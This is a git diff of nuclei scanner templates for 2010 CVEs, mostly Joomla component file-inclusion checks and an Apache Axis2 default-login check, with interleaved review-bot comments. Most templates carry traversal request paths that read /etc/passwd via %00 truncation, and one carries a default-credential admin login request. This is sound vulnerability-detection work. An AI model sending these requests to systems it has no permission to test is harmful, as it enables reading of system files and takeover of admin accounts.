@@ -18,7 +20,7 @@ info: cve-id: CVE-2010-1586 cwe-id: CWE-20 epss-score: 0.00917 - epss-percentile: 0.81069 + epss-percentile: 0.81107 cpe: cpe:2.3:a:hp:system_management_homepage:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1
@@ -36,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502205fdd4121663fbd64ae9fb4e66a5e4d45fdb1484a760f41f18860433f6eafc27b022100fb6ccc141275cfd7c8b4c0624a6014ca38802fce342933ae142d9bedabd3440a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f57a607443ab3d3afbecb32664f1d6143de739eaf0a9af290671f808ee175f33022100f241d17fa92db4be2755072bfe591fc4fe9d6dc10f24f02fecf152f383bc496f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1602.yaml b/nuclei-templates/CVE-2010/CVE-2010-1602.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1602.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1602.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1603.yaml b/nuclei-templates/CVE-2010/CVE-2010-1603.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1603.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1603.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml
index 2c3e2fe357..fdc3e5d2a7 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml
@@ -4,25 +4,24 @@ info: name: Joomla! Component Graphics 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. reference: - https://www.exploit-db.com/exploits/12430 - https://www.cvedetails.com/cve/CVE-2010-1653 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1653 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/03/23 + - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1715.yaml b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1715.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1715.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1722.yaml b/nuclei-templates/CVE-2010/CVE-2010-1722.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1722.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1722.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1723.yaml b/nuclei-templates/CVE-2010/CVE-2010-1723.yaml
deleted file mode 100644
index 8d0c4bf2da..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1723.yaml
+++ /dev/null
@@ -1,28 +0,0 @@ -id: CVE-2010-1723 - -info: - name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12289 - - https://www.cvedetails.com/cve/CVE-2010-1723 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1723 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/01
diff --git a/nuclei-templates/CVE-2010/cve-2010-1870.yaml b/nuclei-templates/CVE-2010/CVE-2010-1870.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1870.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1870.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml
index c2a02c7a21..5e71f4a39f 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml
@@ -1,26 +1,27 @@ id: CVE-2010-1952 + info: name: Joomla! Component BeeHeard 1.0 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12239 - https://www.cvedetails.com/cve/CVE-2010-1952 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1952 + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/cve-2010-1954.yaml b/nuclei-templates/CVE-2010/CVE-2010-1954.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1954.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1954.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1956.yaml b/nuclei-templates/CVE-2010/CVE-2010-1956.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1956.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1956.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1981.yaml b/nuclei-templates/CVE-2010/CVE-2010-1981.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1981.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1981.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1982.yaml b/nuclei-templates/CVE-2010/CVE-2010-1982.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1982.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1982.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-2033.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-2033.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2034.yaml b/nuclei-templates/CVE-2010/CVE-2010-2034.yaml
index 6816c7f0fc..4600c605a4 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-2034.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-2034.yaml
@@ -4,14 +4,11 @@ info: name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34003 - https://www.cvedetails.com/cve/CVE-2010-2034 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2034 requests: - method: GET
@@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/cve-2010-2035.yaml b/nuclei-templates/CVE-2010/CVE-2010-2035.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-2035.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-2035.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml
index c5ed113fab..e3db0ee030 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-2037.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-2037.yaml
@@ -1,29 +1,27 @@ id: CVE-2010-2037 + info: name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal author: daffainfo severity: high - description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + description: Directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/34005 - https://www.cvedetails.com/cve/CVE-2010-2037 - - http://web.archive.org/web/20210615115919/https://www.securityfocus.com/bid/40244 - - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2037 tags: cve,cve2010,lfi,joomla + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml b/nuclei-templates/CVE-2010/CVE-2010-2045.yaml
index 573d854a25..b40cfaab94 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-2045.yaml
@@ -1,28 +1,27 @@ id: CVE-2010-2045 + info: name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12595 - https://www.cvedetails.com/cve/CVE-2010-2045 - - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2045 tags: cve,cve2010,joomla,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/17 + - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml b/nuclei-templates/CVE-2010/CVE-2010-2259.yaml
deleted file mode 100644
index 0c0f4bd863..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-2259.yaml
+++ /dev/null
@@ -1,29 +0,0 @@ -id: CVE-2010-2259 -info: - name: Joomla! Component com_bfsurvey - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10946 - - https://www.cvedetails.com/cve/CVE-2010-2259 - - http://secunia.com/advisories/37866 - - http://www.exploit-db.com/exploits/10946 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2259 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/cve-2010-2307.yaml b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-2307.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-2307.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2507.yaml b/nuclei-templates/CVE-2010/CVE-2010-2507.yaml
index d825dbaefc..4ff7972b09 100644
--- a/nuclei-templates/CVE-2010/CVE-2010-2507.yaml
+++ b/nuclei-templates/CVE-2010/CVE-2010-2507.yaml
@@ -1,29 +1,27 @@ id: CVE-2010-2507 + info: name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: + description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | - https://www.exploit-db.com/exploits/13981 - https://www.cvedetails.com/cve/CVE-2010-2507 - - http://secunia.com/advisories/40297 - - http://osvdb.org/65674 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2507 tags: cve,cve2010,joomla,lfi + requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - - 200 - -# Enhanced by mp on 2022/02/17 + - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-2680.yaml b/nuclei-templates/CVE-2010/CVE-2010-2680.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-2680.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-2680.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml
deleted file mode 100644
index fc296e1ccb..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml
+++ /dev/null
@@ -1,32 +0,0 @@ -id: CVE-2010-2857 - -info: - name: Joomla! Component Music Manager - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/14274 - - https://www.cvedetails.com/cve/CVE-2010-2857 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-2857 - -requests: - - method: GET - path: - - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-2918.yaml b/nuclei-templates/CVE-2010/CVE-2010-2918.yaml deleted file mode 100644 index 6ba32a4b2d..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-2918.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: CVE-2010-2918 -info: - name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion - author: daffainfo - severity: high - description: A PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. - reference: - - https://www.exploit-db.com/exploits/31708 - - https://www.cvedetails.com/cve/CVE-2010-2918 - - http://web.archive.org/web/20210127190100/https://www.securityfocus.com/bid/28942/ - - https://www.exploit-db.com/exploits/14476 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-2918 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-2920.yaml b/nuclei-templates/CVE-2010/CVE-2010-2920.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-2920.yaml rename to nuclei-templates/CVE-2010/CVE-2010-2920.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml index e305fa4fca..9eece26cbd 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-3426.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-3426.yaml 
@@ -4,14 +4,11 @@ info: name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/14964 - https://www.cvedetails.com/cve/CVE-2010-3426 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-3426 requests: - method: GET @@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/cve-2010-4617.yaml b/nuclei-templates/CVE-2010/CVE-2010-4617.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-4617.yaml rename to nuclei-templates/CVE-2010/CVE-2010-4617.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml index 70ca65fb69..145fed21d3 100644 --- a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml +++ b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml 
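Review bot: The second hunk loosens the matcher from `"root:.*:0:0:"` to `"root:.*:0:0"`, dropping the field separator that anchors the match to the passwd line layout (`root:x:0:0:...`); any body containing `root:` followed later by `:0:0` and a digit would now match, and the trailing colon costs nothing, so keep `- "root:.*:0:0:"`. The first hunk removes `remediation` and `classification`/`cve-id` at the same time that cve-2010-0219 in this commit gains a full classification block, leaving the tree with inconsistent metadata; at minimum keep `classification:` with `cve-id: CVE-2010-3426`.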
@@ -4,14 +4,11 @@ info: name: Joomla! Component JRadio - Local File Inclusion author: daffainfo severity: high - description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - remediation: Upgrade to a supported version. + description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15749 - https://www.cvedetails.com/cve/CVE-2010-4719 tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-4719 requests: - method: GET @@ -23,10 +20,8 @@ requests: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - - 200 - -# Enhanced by mp on 2022/02/17 + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-4977.yaml b/nuclei-templates/CVE-2010/CVE-2010-4977.yaml deleted file mode 100644 index d6a486b56c..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4977.yaml +++ /dev/null 
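Review bot: Removing `remediation` leaves this template with no fix guidance even though the description on the same hunk states the affected range ("before 1.5.1"), so the replacement is already known; rather than deleting the line, make it specific: `remediation: Upgrade the JRadio (com_jradio) component to 1.5.1 or later.` The `classification`/`cve-id` removal and the loosened `"root:.*:0:0"` regex follow the same pattern as the other Joomla templates in this commit and deserve the same reversal.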
@@ -1,29 +0,0 @@ -id: CVE-2010-4977 -info: - name: Joomla! Component Canteen 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/34250 - - https://www.cvedetails.com/cve/CVE-2010-4977 - - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4977 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2010/cve-2010-5278.yaml b/nuclei-templates/CVE-2010/CVE-2010-5278.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-5278.yaml rename to nuclei-templates/CVE-2010/CVE-2010-5278.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-0157.yaml b/nuclei-templates/CVE-2010/cve-2010-0157.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-0157.yaml rename to nuclei-templates/CVE-2010/cve-2010-0157.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-0219.yaml b/nuclei-templates/CVE-2010/cve-2010-0219.yaml index 9e44b7dcc9..162fed1a75 100644 --- a/nuclei-templates/CVE-2010/cve-2010-0219.yaml +++ b/nuclei-templates/CVE-2010/cve-2010-0219.yaml 
@@ -3,16 +3,34 @@ id: CVE-2010-0219 info: name: Apache Axis2 Default Login author: pikpikcu - severity: high + severity: critical description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - tags: cve,cve2010,axis,apache,default-login,axis2 + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data. + remediation: | + Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - http://www.vupen.com/english/advisories/2010/2673 + - http://retrogod.altervista.org/9sg_ca_d2d.html classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C + cvss-score: 10 cve-id: CVE-2010-0219 + cwe-id: CWE-255 + epss-score: 0.97509 + epss-percentile: 0.99981 + cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: axis2 + shodan-query: http.html:"Apache Axis" + tags: cve,cve2010,axis,apache,default-login,axis2 -requests: +http: - raw: - | POST /axis2-admin/login HTTP/1.1 @@ -20,7 +38,6 @@ requests: Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} - - | POST /axis2/axis2-admin/login HTTP/1.1 Host: {{Hostname}} @@ -37,7 +54,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "
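Review bot: The added `impact` text ("unauthorized access to sensitive information or the ability to modify or delete data") understates what the description on the context line says: the default `axis2` admin password lets an attacker upload a crafted web service and execute arbitrary code, which is also why the severity is raised to critical. Replace the generic sentence with the actual outcome, e.g. `impact: | Remote code execution: anyone who logs in with the default admin credentials can upload a crafted web service and run arbitrary code on the host.` The `# digest:` line appended at the end of the file is a signature over the upstream bytes; if this copy is ever edited locally the digest will no longer match, so it should be regenerated or removed rather than carried along blindly.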

Welcome to Axis2 Web Admin Module !!

" @@ -45,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/02 +# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-0759.yaml b/nuclei-templates/CVE-2010/cve-2010-0759.yaml new file mode 100644 index 0000000000..85c6ddd98e --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0759.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0759 + +info: + name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + reference: + - https://www.exploit-db.com/exploits/11498 + - https://www.cvedetails.com/cve/CVE-2010-0759 + tags: cve,cve2010,joomla,lfi,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0942.yaml b/nuclei-templates/CVE-2010/cve-2010-0942.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-0942.yaml rename to nuclei-templates/CVE-2010/cve-2010-0942.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml b/nuclei-templates/CVE-2010/cve-2010-0944.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-0944.yaml rename to nuclei-templates/CVE-2010/cve-2010-0944.yaml 
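Review bot: This new file uses the legacy `requests:` key while the same commit migrates cve-2010-0219 to `http:`; nuclei v3 still accepts `requests` as a deprecated alias as far as I know, but files added now should use the current key so the repo does not carry both forms. The description says the traversal is "via directory traversal sequences in the files[] parameter", yet the probe sends an absolute path (`files[]=/etc/passwd`); that is a valid check for an unfiltered include, but a miss does not rule out the `..`-based variant, so either add a second path with `../` sequences or note the limitation in a comment.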
diff --git a/nuclei-templates/CVE-2010/cve-2010-1081.yaml b/nuclei-templates/CVE-2010/cve-2010-1081.yaml new file mode 100644 index 0000000000..39650b4327 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1081.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1081 + +info: + name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11511 + - https://www.cvedetails.com/cve/CVE-2010-1081 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml b/nuclei-templates/CVE-2010/cve-2010-1217.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1217.yaml rename to nuclei-templates/CVE-2010/cve-2010-1217.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1302.yaml b/nuclei-templates/CVE-2010/cve-2010-1302.yaml new file mode 100644 index 0000000000..90c52b2f83 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1302.yaml 
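Review bot: The probe depends on `%00` to truncate the include path (`controller=../../../etc/passwd%00`); PHP stopped honouring null bytes in filesystem functions as of 5.3.4, so on any newer runtime the include fails and the template reports nothing even if the traversal bug is still present. That caveat belongs in the template so a negative result is not read as a clean bill: add `# NOTE: relies on %00 truncation, which only works on PHP < 5.3.4; a miss does not clear the target.` above the path. The file also lacks the `classification`/`cve-id` block that cve-2010-0219 gains in this same commit.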
